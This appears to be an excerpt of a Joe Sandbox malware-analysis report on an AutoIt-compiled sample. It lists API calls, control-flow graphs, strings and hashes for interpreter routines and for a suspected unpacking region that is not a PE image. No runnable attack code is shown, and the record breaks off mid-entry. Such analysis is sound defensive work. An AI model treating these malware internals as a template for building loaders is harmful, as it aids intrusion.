                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                            • Opcode ID: ac7d2de2dde4f477b9d940472fe2384babf0ccbdfbd3afba422f7903d5beb9bc
                                                                                                                            • Instruction ID: 8d0e077b3a27902dd00c2f085d3f02eac7bad3555a853c5c665be54b77b08ed1
                                                                                                                            • Opcode Fuzzy Hash: ac7d2de2dde4f477b9d940472fe2384babf0ccbdfbd3afba422f7903d5beb9bc
                                                                                                                            • Instruction Fuzzy Hash: 0E2115B1D0030CAFEB10DFA5ED49B9D7BF4FB0AB11F10012AE504AA2A1D3B55A54AF94
                                                                                                                            Function 00EE3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 767 ee3633-ee3681 769 ee3683-ee3686 767->769 770 ee36e1-ee36e3 767->770 772 ee3688-ee368f 769->772 773 ee36e7 769->773 770->769 771 ee36e5 770->771 774 ee36ca-ee36d2 DefWindowProcW 771->774 777 ee374b-ee3753 PostQuitMessage 772->777 778 ee3695-ee369a 772->778 775 ee36ed-ee36f0 773->775 776 f1d0cc-f1d0fa call ef1070 call ef1093 773->776 779 ee36d8-ee36de 774->779 780 ee3715-ee373c SetTimer RegisterWindowMessageW 775->780 781 ee36f2-ee36f3 775->781 814 f1d0ff-f1d106 776->814 785 ee3711-ee3713 777->785 783 f1d154-f1d168 call f42527 778->783 784 ee36a0-ee36a2 778->784 780->785 789 ee373e-ee3749 CreatePopupMenu 780->789 786 ee36f9-ee370c KillTimer call ee443a call ee3114 781->786 787 f1d06f-f1d072 781->787 783->785 809 f1d16e 783->809 790 ee36a8-ee36ad 784->790 791 ee3755-ee375f call ee44a0 784->791 785->779 786->785 793 f1d074-f1d076 787->793 794 f1d0a8-f1d0c7 MoveWindow 787->794 789->785 797 f1d139-f1d140 790->797 798 ee36b3-ee36b8 790->798 801 ee3764 791->801 802 f1d097-f1d0a3 SetFocus 793->802 803 f1d078-f1d07b 793->803 794->785 797->774 805 f1d146-f1d14f call f37c36 797->805 807 ee36be-ee36c4 798->807 808 f1d124-f1d134 call f42d36 798->808 801->785 802->785 803->807 810 f1d081-f1d092 call ef1070 803->810 805->774 807->774 807->814 808->785 809->774 810->785 814->774 815 f1d10c-f1d11f call ee443a call ee434a 814->815 815->774
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00EE36D2
                                                                                                                            • KillTimer.USER32(?,00000001), ref: 00EE36FC
                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE371F
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE372A
                                                                                                                            • CreatePopupMenu.USER32 ref: 00EE373E
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00EE374D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                            • String ID: TaskbarCreated
                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                            • Opcode ID: d06cf9e2f0cc19fac344892527992365fad27116df2d023291b36438290a6a72
                                                                                                                            • Instruction ID: 8dba28126989c99ea11a3907f6224546ccf46d5d405da97ff5a0256d3f43b2ea
                                                                                                                            • Opcode Fuzzy Hash: d06cf9e2f0cc19fac344892527992365fad27116df2d023291b36438290a6a72
                                                                                                                            • Instruction Fuzzy Hash: EF4167F220058EFBDB109F75EC0DBBA37A4EB06300F142126F502F72E2CA659E44B261
                                                                                                                            Function 00EE3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                            • API String ID: 1825951767-3513169116
                                                                                                                            • Opcode ID: 27ef74fb1b0c3fca6b1cb919cb18a81645dbeab5265cd413288edccd2ad35e2a
                                                                                                                            • Instruction ID: c0aa8f3dc71379fc86b716c0aa3605d7b7207453ba0a1170ebe1a9436f48ebc9
                                                                                                                            • Opcode Fuzzy Hash: 27ef74fb1b0c3fca6b1cb919cb18a81645dbeab5265cd413288edccd2ad35e2a
                                                                                                                            • Instruction Fuzzy Hash: B9A17EB2D0029DAADF05EBA1DC95EEEB7B8BF15310F401429F415B7192DF749A08DB60
                                                                                                                            Function 0143FC98 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1009 143fc98-143fcea call 143fb98 CreateFileW 1012 143fcf3-143fd00 1009->1012 1013 143fcec-143fcee 1009->1013 1016 143fd13-143fd2a VirtualAlloc 1012->1016 1017 143fd02-143fd0e 1012->1017 1014 143fe4c-143fe50 1013->1014 1018 143fd33-143fd59 CreateFileW 1016->1018 1019 143fd2c-143fd2e 1016->1019 1017->1014 1021 143fd5b-143fd78 1018->1021 1022 143fd7d-143fd97 ReadFile 1018->1022 1019->1014 1021->1014 1023 143fdbb-143fdbf 1022->1023 1024 143fd99-143fdb6 1022->1024 1025 143fdc1-143fdde 1023->1025 1026 143fde0-143fdf7 WriteFile 1023->1026 1024->1014 1025->1014 1029 143fe22-143fe47 CloseHandle VirtualFree 1026->1029 1030 143fdf9-143fe20 1026->1030 1029->1014 1030->1014
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0143FCDD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                            • Instruction ID: 1d7e71e964223ef4ac8e36ee79571290bd6f33283b631fd1284dccbd23fb145c
                                                                                                                            • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                            • Instruction Fuzzy Hash: 8C510675A50208FBEB20DFA4CC49FDF7778AF8C710F108519F61AEB281DA749A458B60
                                                                                                                            Function 00EE39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1049 ee39d5-ee3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE3A03
                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3A24
                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00EE3A38
                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00EE3A41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShow
                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                            • Opcode ID: 7fc349f6555c08d60953edb362fbab4d5c3d7b6344ea69a7fa56b7f7d5e9e39f
                                                                                                                            • Instruction ID: 7bc6b4abc633aa53819e0c48736fdfa4beb48b25df09bb02518182f034a6d703
                                                                                                                            • Opcode Fuzzy Hash: 7fc349f6555c08d60953edb362fbab4d5c3d7b6344ea69a7fa56b7f7d5e9e39f
                                                                                                                            • Instruction Fuzzy Hash: BEF03AB05102987EEB3057637C08F2B3EBDD7C7F50B00002ABA00A2171C6610800FAB0
                                                                                                                            Function 00EE407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1050 ee407c-ee4092 1051 ee416f-ee4173 1050->1051 1052 ee4098-ee40ad call ee7a16 1050->1052 1055 f1d3c8-f1d3d7 LoadStringW 1052->1055 1056 ee40b3-ee40d3 call ee7bcc 1052->1056 1059 f1d3e2-f1d3fa call ee7b2e call ee6fe3 1055->1059 1056->1059 1060 ee40d9-ee40dd 1056->1060 1069 ee40ed-ee416a call f02de0 call ee454e call f02dbc Shell_NotifyIconW call ee5904 1059->1069 1072 f1d400-f1d41e call ee7cab call ee6fe3 call ee7cab 1059->1072 1062 ee4174-ee417d call ee8047 1060->1062 1063 ee40e3-ee40e8 call ee7b2e 1060->1063 1062->1069 1063->1069 1069->1051 1072->1069
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F1D3D7
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • _memset.LIBCMT ref: 00EE40FC
                                                                                                                            • _wcscpy.LIBCMT ref: 00EE4150
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE4160
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                            • String ID: Line:
                                                                                                                            • API String ID: 3942752672-1585850449
                                                                                                                            • Opcode ID: c6b92e9ee29e2b4661575e9f6cc849e94cae974492f8aacc963f75ce96b68308
                                                                                                                            • Instruction ID: 43dde25ab7d0c04d9deaba62ee25879c895541ab94689dc33d5db9eff3cccdcc
                                                                                                                            • Opcode Fuzzy Hash: c6b92e9ee29e2b4661575e9f6cc849e94cae974492f8aacc963f75ce96b68308
                                                                                                                            • Instruction Fuzzy Hash: BC310FB100838CAFD720EB61DC46FDB73E8AF55314F10152AF285A20E2EB70A648D793
                                                                                                                            Function 00F0541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1085 f0541d-f05436 1086 f05453 1085->1086 1087 f05438-f0543d 1085->1087 1088 f05455-f0545b 1086->1088 1087->1086 1089 f0543f-f05441 1087->1089 1090 f05443-f05448 call f08b28 1089->1090 1091 f0545c-f05461 1089->1091 1103 f0544e call f08db6 1090->1103 1092 f05463-f0546d 1091->1092 1093 f0546f-f05473 1091->1093 1092->1093 1095 f05493-f054a2 1092->1095 1096 f05483-f05485 1093->1096 1097 f05475-f05480 call f02de0 1093->1097 1101 f054a4-f054a7 1095->1101 1102 f054a9 1095->1102 1096->1090 1100 f05487-f05491 1096->1100 1097->1096 1100->1090 1100->1095 1105 f054ae-f054b3 1101->1105 1102->1105 1103->1086 1107 f054b9-f054c0 1105->1107 1108 f0559c-f0559f 1105->1108 1109 f05501-f05503 1107->1109 1110 f054c2-f054ca 1107->1110 1108->1088 1112 f05505-f05507 1109->1112 1113 f0556d-f0556e call f10ba7 1109->1113 1110->1109 1111 f054cc 1110->1111 1114 f054d2-f054d4 1111->1114 1115 f055ca 1111->1115 1116 f05509-f05511 1112->1116 1117 f0552b-f05536 1112->1117 1124 f05573-f05577 1113->1124 1119 f054d6-f054d8 1114->1119 1120 f054db-f054e0 1114->1120 1121 f055ce-f055d7 1115->1121 1122 f05521-f05525 1116->1122 1123 f05513-f0551f 1116->1123 1125 f05538 1117->1125 1126 f0553a-f0553d 1117->1126 1119->1120 1127 f055a4-f055a8 1120->1127 1129 f054e6-f054ff call f10cc8 1120->1129 1121->1088 1130 f05527-f05529 1122->1130 1123->1130 1124->1121 1131 f05579-f0557e 1124->1131 1125->1126 1126->1127 1128 f0553f-f0554b call f046e6 call f10e5b 1126->1128 1132 f055ba-f055c5 call f08b28 1127->1132 1133 f055aa-f055b7 call f02de0 1127->1133 1146 f05550-f05555 1128->1146 1145 f05562-f0556b 1129->1145 1130->1126 1131->1127 1136 f05580-f05591 1131->1136 1132->1103 1133->1132 1141 f05594-f05596 1136->1141 1141->1107 1141->1108 1145->1141 1147 f0555b-f0555e 1146->1147 1148 f055dc-f055e0 1146->1148 1147->1115 1149 f05560 1147->1149 1148->1121 1149->1145
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1559183368-0
                                                                                                                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                            • Instruction ID: 37aa14df6b306ea9de6ff0c22c66128a0b930f061168e5cf61b54f24ab0a3178
                                                                                                                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                            • Instruction Fuzzy Hash: DC51B375A00B05DBCF24CEA9DC406BF77A6AF40B34F288729E825962D1D7B49D90BF40
                                                                                                                            Function 00EE686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1150 ee686a-ee6891 call ee4ddd 1153 f1e031-f1e041 call f4955b 1150->1153 1154 ee6897-ee68a5 call ee4ddd 1150->1154 1158 f1e046-f1e048 1153->1158 1154->1153 1161 ee68ab-ee68b1 1154->1161 1159 f1e067-f1e0af call f00db6 1158->1159 1160 f1e04a-f1e04d call ee4e4a 1158->1160 1170 f1e0b1-f1e0bb 1159->1170 1171 f1e0d4 1159->1171 1164 f1e052-f1e061 call f442f8 1160->1164 1161->1164 1165 ee68b7-ee68d9 call ee6a8c 1161->1165 1164->1159 1173 f1e0cf-f1e0d0 1170->1173 1174 f1e0d6-f1e0e9 1171->1174 1175 f1e0d2 1173->1175 1176 f1e0bd-f1e0cc 1173->1176 1177 f1e260-f1e271 call f02d55 call ee4e4a 1174->1177 1178 f1e0ef 1174->1178 1175->1174 1176->1173 1188 f1e273-f1e283 call ee7616 call ee5d9b 1177->1188 1179 f1e0f6-f1e0f9 call ee7480 1178->1179 1183 f1e0fe-f1e120 call ee5db2 call f473e9 1179->1183 1194 f1e122-f1e12f 1183->1194 1195 f1e134-f1e13e call f473d3 1183->1195 1201 f1e288-f1e2b8 call f3f7a1 call f00e2c call f02d55 call ee4e4a 1188->1201 1197 f1e227-f1e237 call ee750f 1194->1197 1203 f1e140-f1e153 1195->1203 1204 f1e158-f1e162 call f473bd 1195->1204 1197->1183 1206 f1e23d-f1e25a call ee735d 1197->1206 1201->1188 1203->1197 1213 f1e164-f1e171 1204->1213 1214 f1e176-f1e180 call ee5e2a 1204->1214 1206->1177 1206->1179 1213->1197 1214->1197 1219 f1e186-f1e19e call f3f73d 1214->1219 1225 f1e1c1-f1e1c4 1219->1225 1226 f1e1a0-f1e1bf call ee7de1 call ee5904 1219->1226 1228 f1e1f2-f1e1f5 1225->1228 1229 f1e1c6-f1e1e1 call ee7de1 call ee6839 call ee5904 1225->1229 1250 f1e1e2-f1e1f0 call ee5db2 1226->1250 1231 f1e215-f1e218 call f4737f 1228->1231 1232 f1e1f7-f1e200 call f3f65e 1228->1232 1229->1250 1237 f1e21d-f1e226 call f00e2c 1231->1237 1232->1201 1244 f1e206-f1e210 call f00e2c 1232->1244 1237->1197 1244->1183 1250->1237
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E0F
                                                                                                                            • _free.LIBCMT ref: 00F1E263
                                                                                                                            • _free.LIBCMT ref: 00F1E2AA
                                                                                                                              • Part of subcall function 00EE6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EE6BAD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                            • API String ID: 2861923089-1757145024
                                                                                                                            • Opcode ID: 6f81ffc55b77600971546a40880df2a28f57e9a144e3facdc4ab21dd104fcc10
                                                                                                                            • Instruction ID: 851832e331c02a69341214106b0c3add26a48ed185f26a9e4cb33f27b6064f86
                                                                                                                            • Opcode Fuzzy Hash: 6f81ffc55b77600971546a40880df2a28f57e9a144e3facdc4ab21dd104fcc10
                                                                                                                            • Instruction Fuzzy Hash: C5917A71D00259AFCF04EFA5CC919EDB7B8BF19324F10442AF815BB2A1DB74A945EB50
                                                                                                                            Function 01441728 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01441618: Sleep.KERNELBASE(000001F4), ref: 01441629
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01441885
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileSleep
                                                                                                                            • String ID: Y7QYDFYE0VEH2VZBRFJM0K
                                                                                                                            • API String ID: 2694422964-3757137495
                                                                                                                            • Opcode ID: 6fda2a2dafbcfa590270695f2f7ff12c34470c4c9ed7ed48ad594a3346dfd6ca
                                                                                                                            • Instruction ID: 2ff3f4db7ff2c7bd07813bf5e2b060da95537a515d1e6f6018b843711ed6fd95
                                                                                                                            • Opcode Fuzzy Hash: 6fda2a2dafbcfa590270695f2f7ff12c34470c4c9ed7ed48ad594a3346dfd6ca
                                                                                                                            • Instruction Fuzzy Hash: 49619330D04248DBFF11DBA4D844BEFBB75AF19700F044599E248BB2C0D6BA5B85CB66
                                                                                                                            Function 00EE35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EE35A1,SwapMouseButtons,00000004,?), ref: 00EE35D4
                                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EE35A1,SwapMouseButtons,00000004,?,?,?,?,00EE2754), ref: 00EE35F5
                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00EE35A1,SwapMouseButtons,00000004,?,?,?,?,00EE2754), ref: 00EE3617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                            • Opcode ID: 397eab22b4e4538452d477a171b53f09ac99c8090db8c5565b6c4f0b8296b49c
                                                                                                                            • Instruction ID: 8e86be9755432757d3a269296389a3b1f1a487077fbfeabf98681f700ed9b842
                                                                                                                            • Opcode Fuzzy Hash: 397eab22b4e4538452d477a171b53f09ac99c8090db8c5565b6c4f0b8296b49c
                                                                                                                            • Instruction Fuzzy Hash: 3511487191024DBFDB20CFB5EC489EEBBB8EF05744F0164A9E805E7210D2719E44A760
                                                                                                                            Function 00F4955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4EE5: _fseek.LIBCMT ref: 00EE4EFD
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49824
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49837
                                                                                                                            • _free.LIBCMT ref: 00F496A2
                                                                                                                            • _free.LIBCMT ref: 00F496A9
                                                                                                                            • _free.LIBCMT ref: 00F49714
                                                                                                                              • Part of subcall function 00F02D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F09A24), ref: 00F02D69
                                                                                                                              • Part of subcall function 00F02D55: GetLastError.KERNEL32(00000000,?,00F09A24), ref: 00F02D7B
                                                                                                                            • _free.LIBCMT ref: 00F4971C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1552873950-0
                                                                                                                            • Opcode ID: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
                                                                                                                            • Instruction ID: 940201c6239768c78705d574b32751970a5d2833222f95170e5ffcc845ec8fed
